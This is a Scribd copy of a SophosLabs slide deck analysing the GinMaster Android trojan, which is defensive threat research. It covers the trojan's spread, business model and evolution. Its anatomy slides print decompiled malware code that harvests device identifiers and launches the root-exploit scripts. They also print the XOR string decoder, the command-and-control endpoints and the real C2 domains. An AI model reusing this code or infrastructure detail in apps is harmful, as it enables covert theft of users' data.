Scribd
Upload
92 views41 pages

GinMaster Android Malware Analysis

GinMaster is a family of Android malware apps that have been distributed through third-party app stores in China since 2011. It functions as a trojan by exploiting vulnerabilities in Android versions and escalating root privileges on devices. It can steal sensitive device and user information which it stores in an on-device database and transmits to a remote command and control server using HTTP requests. The malware apps use complex obfuscation techniques including custom binaries and shell scripts to automatically install other apps and receive updates from its operators.

Uploaded by

PrintiaAlena
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
92 views41 pages

GinMaster Android Malware Analysis

GinMaster is a family of Android malware apps that have been distributed through third-party app stores in China since 2011. It functions as a trojan by exploiting vulnerabilities in Android versions and escalating root privileges on devices. It can steal sensitive device and user information which it stores in an on-device database and transmits to a remote command and control server using HTTP requests. The malware apps use complex obfuscation techniques including custom binaries and shell scripts to automatically install other apps and receive updates from its operators.

Uploaded by

PrintiaAlena
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

GinMaster

A case study in Android malware

Rowland YU
Threat Research, SophosLabs

1
What is GinMaster?

Android GinMaster is
a Trojanized and re-packaged application family
distributed in Chinese thirty party stores
targeting Android mobile devices

2
Where does GinMaster come from?

• Discovered in August 2011


• First Android malware to exploit GingerBreak by
attacking Android 2.3 (code name Gingerbread)
• First named GingerMaster, now known as GinMaster

3
What about GinMaster?

• Duration
• Volume
• Growth
• Location
• Types
• Complexity
• $$$
• Comparison between PC and Android Malware
4
Long Duration

26 months of GinMaster attacks


since August 2011

5
Top 3 Android Malware by Volume
19100, 4%
300+ malware
families have been
recorded by SophosLabs.

GinMaster
Rest of Malware

6
Dramatic Growth of GinMaster Variants

Quarterly View
6000

5000

4000

3000

2000

1000

7
Location – China
150M Android devices in China
2012 Smartphone Market Share

27%
China
USA
46%
India
Brazil
United Kingdom
18% Rest of World

6%
* Source from idc.com
2% 3%

8
Location – Chinese third-party stores

Over 400 popular third-party stores in China

9
Location – high infect rate in China

2013 Global Infect Rates

USA, 6.53%

India, 10.38%

Russia, 17.15%

China, 31.71%

* Report from NQ Mobile

10
Types of Android Malware

Data Stealer

Premium
Rootkit Service
Abuser

GinMaster

Click
Trojan Spy
Fraudster

Malicious
Downloader

11
Complexity – Sophisticated Functionalities

Teardown of 1st GinMaster Generation

12
13
GinMaster Video
Anatomy of GinMaster

• Permissions
• AndroidManifest file
• Main part of malicious code
• Binaries and shell scripts
• Database
• Command and Control

14
Permissions
uses-permission:'android.permission.READ_PHONE_STATE'
uses-permission:'android.permission.READ_LOGS'
uses-permission:'android.permission.DELETE_CACHE_FILES'
uses-permission:'android.permission.ACCESS_CACHE_FILESYSTEM'
uses-permission:'android.permission.WRITE_SECURE_SETTINGS'
uses-permission:'android.permission.ACCESS_NETWORK_STATE'
uses-permission:'android.permission.INTERNET'
uses-permission:'android.permission.WRITE_EXTERNAL_STORAGE'
uses-permission:'android.permission.MOUNT_UNMOUNT_FILESYSTEMS'
uses-permission:'android.permission.READ_OWNER_DATA'
uses-permission:'android.permission.WRITE_OWNER_DATA'
uses-permission:'android.permission.WRITE_SETTINGS'
uses-permission:'com.android.launcher.permission.INSTALL_SHORTCUT'
uses-permission:'com.android.launcher.permission.UNINSTALL_SHORTCUT'
uses-permission:'android.permission.RECEIVE_BOOT_COMPLETED'
uses-permission:'android.permission.RESTART_PACKAGES'
uses-permission:'android.permission.READ_EXTERNAL_STORAGE’

15
AndroidManifest file
<activity android:label="@string/image_name" android:icon="@drawable/image_icon"
android:name=".Web" android:launchMode="singleInstance"
android:screenOrientation="portrait" android:configChanges="keyboardHidden|orientation">
……

<service android:name=".GameService" android:enabled="true"


android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</service>

<receiver android:name="GameBootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>

16
'GameService' – main part of the malicious code
// register a PACKAGE_ADDED receiver
IntentFilter localIntentFilter1 = new
IntentFilter("android.intent.action.PACKAGE_ADDED");
localIntentFilter1.addAction("android.intent.action.PACKAGE_ADDED");
localIntentFilter1.addCategory("android.intent.categroy.DEFUAULT");
localIntentFilter1.addDataScheme("package");
this.c = new GameBootReceiver();
registerReceiver(this.c, localIntentFilter1);
// register a PACKAGE_REMOVED receiver
IntentFilter localIntentFilter2 = new
IntentFilter("android.intent.action.PACKAGE_REMOVED");
localIntentFilter2.addAction("android.intent.action.PACKAGE_REMOVED");
localIntentFilter2.addCategory("android.intent.categroy.DEFUAULT");
localIntentFilter2.addDataScheme("package");
registerReceiver(this.c, localIntentFilter2);

17
// create a SQLite database used for harvesting package information
this.a = openOrCreateDatabase("game_service_package.db", 268435456, null);
this.a.execSQL("CREATE TABLE IF NOT EXISTS game_package (package_name
char(128) not null default '',version_name char(128) not null default
'',version_code char(16) not null default '',status char(1) not null default '1',soft_id
char(10) not null default '',primary key (package_name))");
Log.i("GameSvc", "create db in onCreate");
this.a.execSQL("CREATE INDEX IF NOT EXISTS pni ON game_package
(package_name)");
this.a.execSQL("CREATE INDEX IF NOT EXISTS si ON game_package (soft_id)");
// collect sensitive information including the device id, phone number,
network type and others
SharedPreferences.Editor localEditor = this.b.edit();
localEditor.putString("imei", this.f);
localEditor.putString("imsi", this.g);
localEditor.putString("cpuid", this.k);
localEditor.putString("simNum", this.h);
localEditor.putString("telNum", this.i);

18
// ELF32 for ARM binaries and shell scripts
a("gbfm.png");
a("install.png");
a("installsoft.png");
a("runme.png");
}
try
{
// prepare and launch the exploit at the background
String str = "chmod 775 " + getFilesDir() + "/gbfm.sh " +
getFilesDir() + "/install.sh " + getFilesDir() + "/installsoft.sh " +
getFilesDir() + "/runme.sh ";
Log.i("GameSvc", str);
Runtime.getRuntime().exec(str);

19
Binaries and shell scripts
• gbfm.png – the exploit binary to escalate root privilege
• install.png – a shell script used to configure files in system
partition for later usage
• installsoft.png – another shell script for the remote command
& control service to install application silently
• runme.png – an ELF binary to execute above shell scripts

20
Database
game_package game_service_download game_service_folder
package_name char(128) soft_id int(11) file_id int(11)

version_name char(128) package_name varchar(32) file_title varchar(32)

version_code char(16) app_name varchar(32) icon_file varchar(128)

status char(1) icon varchar(32) package_name varchar(128)

soft_id char(10) url varchar(32) version_name varchar(32)

primary key (package_name) status int(1) version_code varchar(32)

completed int (11) folder_id varchar(32)

total int(11) folder_title varchar(32)

filepath varchar(128) primary key (folder_id, package_name)

21
Command and Control
http://<url>/report/first_run.do Report the starting of the GinMaster

http://<url>/report/install_success.do Post package information when installing a package

http://<url>/report/uninstall_success.do Post package information when uninstalling a


package
http://<url>/report/install_list.do Report information when installing a list of packages

http://<url>/request/config.do Configure The frequency for checking into the server

http://<url>/request/push.do soft_last_id

http://<url>/request/alert.do alert_last_id

http://<url>/request/index.do Not sure

http://<url> /request/update.do Not sure

http://<url>/client.php?action=softlist Get a whole list of software

http://<url>/client.php?action=soft&soft_id= Get a link to a specified software

http://<url>/client.php?action=softlist&type=search&word= Search a list of software with specified word

22
Complexity – Obfuscation and Encryption

Evolution of GinMaster

23
Breakdown by Generation
Smarter GinMaster

1st Generation
5%

2nd Generation
37%

3rd Generation
58%

24
2nd Generation – Close to Polymorphism
In the beginning of 2012

public static String b(String paramString)


{
byte[] arrayOfByte = d.b(paramString).getBytes();
for (int i1 = 0; i1 < arrayOfByte.length; i1++)
arrayOfByte[i1] = (byte)(0x78 ^ arrayOfByte[i1]);
return new String(arrayOfByte);
}
25
Command and Control
Encrypted String XORed with 0x78 in Base64 encode Decrypted String

EAwMCEJXVxtWSBcXSBcXSFYRFh4XQktKQE9LVxsUER0WDBY http://c.0oo0oo0.info:32873/clientnew.php
dD1YIEAg=
EAwMCEJXVxtWGQgIDh0KER4BVhEWHhdCS0pAT0tXGxQRHRY http://c.appverify.info:32873/clientnew.php
MFh0PVggQCA==
GRsMERcWRQodCBcKDF4MAQgdRREWCwwZFBQnCw0bGx0LC action=report&type=install_success
w==
GRsMERcWRQodCBcKDF4MAQgdRRwXDxYUFxkcJwsNGxsdCws action=report&type=download_success
=
GRsMERcWRQodCBcKDF4MAQgdRR4RCgsMJwoNFg== action=report&type=first_run

GRsMERcWRRkUHQoM action=alert

GRsMERcWRQgNCxA= action=push

GRsMERcWRQsXHgxeCxceDCcRHEU= action=soft&soft_id=

26
Plaintext in Database

27
Install Apk with Intent
public final void a(String paramString)
{
Intent localIntent = new Intent();
localIntent.addFlags(268435456);
localIntent.setAction("android.intent.action.VIEW");
localIntent.setDataAndType(Uri.fromFile(new
File(paramString)), "application/vnd.android.package-
archive");
startActivity(localIntent);
}

28
Sophisticated 3rd Generation

29
Sample of encrypted and decrypted strings in
3rd GinMaster Generation

Encrypted string by a customized algorism Decrypted String

JTk5PXdiYi5jfSIifSIifWMkIysid35/dXp+Yi4hJCgjOSMoOmM9JT0= http://c.0oo0oo0.info:32873/clientnew.php

JTk5PXdiYi5jLD09Oyg/JCs0YyQjKyJ3fn91en5iLiEkKCM5Iyg6Yz0 http://c.appverify.info:32873/clientnew.php
lPQ==
LC45JCIjcD8oPSI/OWs5ND0ocCQjPjksISESPjguLig+Pg== action=report&type=install_success

LC45JCIjcD8oPSI/OWs5ND0ocCkiOiMSLD0m action=report&type=down_apk

LC45JCIjcCwhKD85 action=alert

LC45JCIjcCAiPygkIz45LCEhazk0PShwKig5 action=moreinstall&type=get

Dh8IDBkIbRkMDwEIbQQLbQMCGW0IFQQeGR5t CREATE TABLE IF NOT EXISTS

ZRY9LC4mLCooAywgKBBtOywfDgUMH2V+fWRtbRgDBBwYCG ([packageName] vaRCHAR(30) UNIQUE


0DAhltAxgBAW0dHwQADB8UbQYIFGE= NOT NULL PRIMARY KEY,

30
$$$

• Considerable profit generated by GinMaster


• The business model of GinMaster
• The business strategies of GinMaster

31
Inside the GinMaster $$$ Factory

1M¥
High risk high yield
7‰ 0.5-2 ¥per installation

150M infection
rate
Estimated 2-30,000 download/month

Devices
1M Low risk low yield
Estimated 0.02 ¥ per user/day $245,000
infected
devices
0.5M¥

32
In-App Ads
7 User downloads

Business Model of GinMaster


apps with malware
2 code

Ads Agents

End Users Third-Party App


Stores
Download Apps - Send device id, phone id, phone
from legit
6 developers 3 number, etc.
- Report package info of packages
installed or uninstalled in the device

Malware writer uploads


Command & Control apps to 3rd party app
5 - Change configuration 1 stores
- Silently download files

Malicious writer helps legit


developers to promote their
4 applications
Legitimate
Developers
Malware Writer

33
Business Strategies of GinMaster

In order to maximize the profit, the malware writer has to keep


the malicious applications on users’ devices as long as possible.

The malware writer utilizes the following 3 strategies


to achieve above objective.

34
Strategy 1
Pick the most suitable category to attract users.

1st Generation Sexy 2nd Generation Book Sexy 3rd Generation


Book
Pic Pic

Book

Game

Sexy
Pic Game Game

35
Strategy 2
Re-packaging interesting and exciting applications for downloading.

36
Strategy 3
Frequently change certificate and encryption algorism
against detection.

Frequency of Each App Certificate on average


1st Generation 33.19
2nd Generation 3.81
3rd Generation 1.32

37
Comparison between PC and Android Malware

Cipher Polymorphic Botnet

PC 2 years (XOR) 6 years 9 years

Android 4 months (DES) 1.5 years 1 year

38
Conclusion
• The GinMaster ecosystem is a representative model of China
Android malware.

• This model is reaching other emerging countries such as


Thailand and Vietnam.

• There is no end to the war in sight.

39
The Android Malware Saga

To be continued

40
Q&A

41

You might also like